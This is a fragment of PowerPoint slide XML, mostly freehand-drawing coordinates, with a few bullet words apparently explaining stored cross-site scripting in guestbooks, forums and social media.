                <a:ext cx="81720" cy="9108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FA45E72D-5E67-4C91-A73A-E6CA3CC426F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9886" y="3520034"/>
                  <a:ext cx="99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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5436286" y="3529034"/>
                <a:ext cx="105120" cy="8100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10ECF6C1-6978-4065-A10C-0CAFD8EEC6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27646" y="3520394"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5572006" y="3404834"/>
                <a:ext cx="66600" cy="2491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F53BF492-2057-4E26-B342-F170D3D3771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563006" y="3395834"/>
                  <a:ext cx="84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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5537086" y="3504194"/>
                <a:ext cx="85680" cy="2340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46B0F426-AFB4-47E5-8008-E98F8E8A024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28446" y="3495194"/>
                  <a:ext cx="103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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5660926" y="3406994"/>
                <a:ext cx="74880" cy="17496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A60F3E6B-6604-47E2-9B06-E662AA05C71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51926" y="3398354"/>
                  <a:ext cx="92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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5754526" y="3503474"/>
                <a:ext cx="55440" cy="7596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3C598CA4-B450-4291-BEB6-20E05A3E0B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745526" y="3494474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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5855326" y="3489794"/>
                <a:ext cx="82080" cy="64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68595295-C596-48F8-8F15-1193D02307D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46326" y="3481154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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5952166" y="3395474"/>
                <a:ext cx="35280" cy="1666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935DCADF-D494-4F2C-88E1-44DCA73AB0A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943526" y="3386834"/>
                  <a:ext cx="52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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5921206" y="3478274"/>
                <a:ext cx="89640" cy="2304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47CF2D7F-8189-4097-A306-60529FF9339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2566" y="3469274"/>
                  <a:ext cx="107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6091846" y="3497714"/>
                <a:ext cx="97200" cy="16884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797FCC47-3845-4EE8-98BD-9D1313C60B3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83206" y="3489074"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6228286" y="3498794"/>
                <a:ext cx="114840" cy="8064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C1738823-F550-4F75-8BA9-467E77F0A31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9646" y="3489794"/>
                  <a:ext cx="13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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6347086" y="3480794"/>
                <a:ext cx="123840" cy="15588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03B4EC8F-FBB8-40AA-8CBC-99EEBC164B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38086" y="3472154"/>
                  <a:ext cx="141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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6506926" y="3380714"/>
                <a:ext cx="62280" cy="16848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63D94BD3-3036-4744-AEA6-43DCF04B914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98286" y="3372074"/>
                  <a:ext cx="79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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6576766" y="3491954"/>
                <a:ext cx="84960" cy="6120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BB408BAD-2879-4545-87F9-7755BFCF6D7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568126" y="3483314"/>
                  <a:ext cx="102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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6693046" y="3455954"/>
                <a:ext cx="67320" cy="8136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C9F6DA06-058E-4CE9-9AFF-1ADEED4514D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84046" y="3447314"/>
                  <a:ext cx="84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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6780166" y="3467834"/>
                <a:ext cx="84240" cy="70560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="185" name="Freihand 184">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE4EFD0-84A1-4255-8AF6-23C30AC110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71166" y="3459194"/>
                  <a:ext cx="101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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6875206" y="3374234"/>
                <a:ext cx="23400" cy="133200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="186" name="Freihand 185">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5250FBE4-8708-412A-BADC-DC2C231E026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66206" y="3365594"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7023166" y="3424634"/>
                <a:ext cx="7920" cy="86400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="187" name="Freihand 186">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ACC52D-E734-43A8-9DA1-630C51AA5FB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14166" y="3415634"/>
                  <a:ext cx="25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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7030726" y="3352634"/>
                <a:ext cx="4320" cy="24480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="188" name="Freihand 187">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF7E650-99A3-428B-BFF6-8CB1F9D8043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022086" y="334363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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7077166" y="3439754"/>
                <a:ext cx="74160" cy="55800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="189" name="Freihand 188">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A98570-161C-47FD-972B-B28B58F545A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68166" y="3431114"/>
                  <a:ext cx="91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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7244206" y="3316634"/>
                <a:ext cx="127440" cy="170280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="191" name="Freihand 190">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13B5CCFE-4CB1-45A9-BE19-97717F0A0B6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235206" y="3307634"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7406926" y="3374234"/>
                <a:ext cx="101160" cy="106920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="192" name="Freihand 191">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66FCC015-D26A-417D-A48D-48C593C5DF5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398286" y="336559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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7535086" y="3363074"/>
                <a:ext cx="68400" cy="9648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33DBB594-30CC-45CF-8BFA-1F06335B2B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26086" y="3354434"/>
                  <a:ext cx="86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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7663246" y="3364154"/>
                <a:ext cx="81720" cy="14364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8719957-3BFB-4CDB-9790-9EF8EA0AC80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54246" y="3355154"/>
                  <a:ext cx="99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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7787086" y="3439754"/>
                <a:ext cx="11880" cy="684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C6A5A021-E20B-4369-98C4-FBB58A0E11D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778446" y="3431114"/>
                  <a:ext cx="29520" cy="2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Gewitterblitz 197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0902F4-1D4A-4096-9171-DCEE0118B644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3762186" y="3435974"/>
            <a:ext cx="496220" cy="648042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EFE39E35-A73F-4B9F-9AAF-8620867E9C3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C055820A-B62B-463A-9736-BA3E9429064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675C6FFD-CA46-498D-BE74-BAA3A6DF6E8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9C363D30-548A-46D0-94A1-352D230B97FA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72905692-A2D3-4BC7-A66D-CB3F8AC5DD5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0CA437B7-468F-4F32-8F40-1BC513F292D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7F37F131-BADF-4810-A699-7C01364A81BC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942FA946-1C71-4797-B59F-7CA07EC68563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30207CAE-8C26-465B-9681-21187AC7719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4C19DD0-84CE-4FB0-8B47-F3B7A72B0BDC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FC8ADFAE-A574-4C10-B8C7-7C6A42F682C0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210A1344-904A-403A-B8BD-1E46AC31508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461DABC-CB4E-4F7A-95C1-6D24EC7C4A0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477521AE-0748-4941-846D-CB795909DA7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9" name="Freihand 198">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DCAB406-FED9-4082-AD31-8ECE662E59D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420D0260-6655-4853-AB7E-63FDED26F55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BF6259EB-E869-4E16-A182-C25D7A51A00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D730F54-E96B-4406-A97F-2ACD9F0B366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5F02F32D-2E31-4036-9AA5-B62A1789DBB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uppieren 201">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44C7471-7BC6-42A8-B977-9B42C694AE1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FEEA8A4-DB80-4AA0-A5A8-4FABD99F824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7BE53DF5-8028-482C-B538-F90317BB63C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3" name="Freihand 202">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA214C0-EA8C-4B74-8B17-16ED9E702B1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EE76C72D-3E7B-4DA5-AD03-34D5F4375F07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F11305C7-AAC3-4622-8602-478F3662515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5E5DB98-E716-4088-86A4-AD37872AFED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43E1ED8D-11C7-4C74-83E8-999DD4E358D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CFA6BE5F-4F9C-480D-808C-A4335872CD4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A6C5CDE0-F918-4106-956A-D07492FB064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uppieren 223">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A5439F-3754-447E-99F3-B0062A7FD85B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EE2B64F5-21B8-4160-BDD8-F4F7A24F5EFC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72598D8B-A202-4A9D-8769-A288F76E9EF2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98560795-913B-400D-BE1D-A933B2D6F2D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8" name="Gruppieren 227">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D0D822E-9A82-4EB6-98C3-D9742896E8B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C70F2A99-78F0-4FE5-9124-D9C77051DBA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E26584D2-A4DB-49D8-B14C-1E5606A86C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31" name="Freihand 230">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E6F748-95FD-4B10-92F9-7963698CBA8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363848F7-4BB7-4F36-A816-F4D90B4493B1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33" name="Freihand 232">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A157FC-87A9-433C-8DFC-9CBE14BE397B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106C53BB-38A1-4F5E-B67C-83D488215F6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057EF807-3E2C-4DB6-AA4D-81BF56DE095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6" name="Freihand 235">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E83F75C-C768-4BF3-8AF1-4FD4485FB05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37" name="Freihand 236">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{969A62F1-584F-4F0F-BEF6-405D25CAD7B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4C87D154-FB95-4E85-9626-ED0AE0D1257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39" name="Freihand 238">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA077AF7-9B77-4599-8BEF-C24A8A2B75A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531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6" grpId="0"/>
      <p:bldP spid="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046787" y="2827323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209286" y="2960954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00286" y="2951954"/>
                <a:ext cx="1651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196686" y="2978234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87686" y="2969594"/>
                <a:ext cx="23148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364446" y="2557754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081126" y="2684834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163570" y="2451194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232690" y="3382874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234130" y="3624434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516886" y="3893714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221354" y="4417945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266971" y="3783374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44585827-E702-499F-81A4-D718C85B1C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5523230" y="4352203"/>
            <a:ext cx="64934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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>persistent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stored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application</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="20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guestbook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forum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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>social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media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, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>victim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receives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exploit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-code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viewing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000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" sz="20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BE4D945D-A314-4612-A05A-44AAA74BDDCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="848371" y="2583674"/>
            <a:ext cx="2266560" cy="1233360"/>
            <a:chOff x="8755481" y="4747220"/>
            <a:chExt cx="2266560" cy="1233360"/>
          </a:xfrm>
        </p:grpSpPr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A0874B14-E556-460B-AEAB-F76ED6A74C1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7B6927FF-ED13-48DD-9171-855D6A07B80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5815444-E735-40C9-A22F-9BA30BC11127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ECD47834-C5B1-4950-988A-33716ABD6EB3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B5CC934A-9904-4FAE-BBEC-0015F97566A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24B237A2-1572-4B95-A4D8-1D4ECF4172D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DBDF2950-C1B7-42C3-B33B-AFDD62F171F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1D6D303B-4AF1-45CE-BDB4-571BA75413A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1E3B633C-7213-4708-BA34-4D1F2FD3CA7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E00609DC-1DE1-4F73-8D4B-EB9EEEBA7CF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817B0205-8D5E-4892-BA91-377E6375D4E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225681E5-CD59-48B6-99A3-1342E9B6EB7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247E2046-CC25-467F-BC66-94C27588933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96C8C2A7-CA42-4D3B-8388-A39DBFFF431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463AE410-9646-4E6B-8270-5D70B168448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B08D9F8-A467-4877-87A8-9664BF27F7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4B953EA2-A285-411A-9645-4EE52F58CAD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C474798A-9446-44E8-8C22-8F9233D044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C3E0263B-E8E9-4273-98ED-EA42064B4CA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1CE5BB0B-8A1F-40F1-9363-64F93201D3DD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A07EC04F-1481-4B72-8185-FD21721FBAE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1" name="Freihand 150">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BFD7C2A-CF2C-47AF-9D9D-C5276FD5A13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B0E1AB4B-8BF3-4AF6-9FA4-49A699EB5922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4140AB2-1CC1-4F66-A916-0CC6A4254CF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BB95D13D-8484-4A25-9D1F-B2E4C6FB146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352697D-FABD-4CEF-8E82-5B533C6089D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5EABC6B8-42FE-4F9E-8513-6B3BD5BCCD5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39E11A2E-6A94-464E-B80B-DCA16054B0A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2" name="Gruppieren 171">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52A3271-1BC3-49A2-B469-9706E741ABB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5156706" y="2873474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09B719D7-CF40-4422-BA9C-5F7A4F65C576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85E5C6FD-77FF-4414-8D56-B7A8EEBEEEC7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F5438D72-0F21-4D86-9F4E-545DED2C1E3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D95A4FE3-052F-4BB4-ABFA-B84C41AC353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88CC3D67-FA9A-40C7-98E8-7A3F4339BA08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30930D41-C8C4-4746-BFE6-D2C4E8EF91A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3A0ACD4B-EC83-4407-82EB-C23F5F0A8F77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539AC352-87A4-4429-98A5-3AABF9FB2332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08D0FA2A-ED5B-4E3C-8BF9-6229C9EC55C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0C6172A-6398-4978-8AB3-08B860CBD8C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D51EFC3E-5915-413D-98D1-AF00B94137D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641A6708-5CBA-4616-8AF8-C8079F1F9EC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25D636D4-F3D1-4608-93E8-D728C36C1E2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F5A1B77C-0892-4037-AF1F-65E7A2A289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1BC3EBE8-1684-4101-AC0E-168898A90C91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C639-4E4E-4141-AF0F-7A4C0A5F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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1039" name="Gruppieren 1038">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05965994-66C4-4C20-A1DB-ACC1EF70C7B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9404141" y="1608127"/>
            <a:ext cx="1824994" cy="1001160"/>
            <a:chOff x="1165452" y="1554434"/>
            <a:chExt cx="1824994" cy="10011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28CCE68-BEA7-4907-9E7D-EF8CB5D4E3E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2604526" y="1554434"/>
              <a:ext cx="385920" cy="374040"/>
              <a:chOff x="2604526" y="1554434"/>
              <a:chExt cx="385920" cy="37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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2634406" y="1674314"/>
                  <a:ext cx="262440" cy="254160"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="17" name="Freihand 16">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC56CA86-69BB-408E-9304-8A2FC19911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25406" y="1665314"/>
                    <a:ext cx="28008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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2724766" y="1755314"/>
                  <a:ext cx="8280" cy="6840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="18" name="Freihand 17">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A6399F0-B1FC-47DA-AEAE-04B557BB64F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16126" y="1746314"/>
                    <a:ext cx="259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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2798566" y="1763954"/>
                  <a:ext cx="19800" cy="29520"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="19" name="Freihand 18">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF271EFB-B98A-4429-B891-D6481BC4FBB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89566" y="1754954"/>
                    <a:ext cx="3744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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2740246" y="1809674"/>
                  <a:ext cx="15840" cy="39600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="21" name="Freihand 20">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B7689E-F462-4780-A48B-9FED0B454D2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31606" y="180103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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2674366" y="1870874"/>
                  <a:ext cx="74160" cy="183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CCD3FE3B-74DB-4C9C-8768-4902DB2C2B1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5366" y="1861874"/>
                    <a:ext cx="918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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2604526" y="1646594"/>
                  <a:ext cx="385920" cy="54720"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="24" name="Freihand 23">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F5D8170-BB25-4784-99E0-B08FE95D71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595886" y="1637594"/>
                    <a:ext cx="40356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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2697766" y="1554434"/>
                  <a:ext cx="214200" cy="12456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71879D2A-33CA-4207-9037-3B64F503DD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88766" y="1545794"/>
                    <a:ext cx="2318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6" name="Gruppieren 1025">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1D42FA-146B-4B07-A516-565CCA46E322}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2532166" y="1942874"/>
              <a:ext cx="371520" cy="612720"/>
              <a:chOff x="2532166" y="1942874"/>
              <a:chExt cx="371520" cy="61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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2643406" y="1942874"/>
                  <a:ext cx="75240" cy="47592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B949BF4A-A1F0-43A0-B1D6-40626618442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34406" y="1933874"/>
                    <a:ext cx="92880" cy="49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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2532166" y="2379194"/>
                  <a:ext cx="131040" cy="176400"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="28" name="Freihand 27">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31A24B5A-5094-4548-A92A-E7513F83F49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523166" y="2370554"/>
                    <a:ext cx="14868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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2670406" y="2394674"/>
                  <a:ext cx="162000" cy="147240"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="29" name="Freihand 28">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F571C095-1AD3-432C-BB4B-FFF32DFCDCC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61766" y="2385674"/>
                    <a:ext cx="1796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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2554126" y="2089034"/>
                  <a:ext cx="120600" cy="114480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="30" name="Freihand 29">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
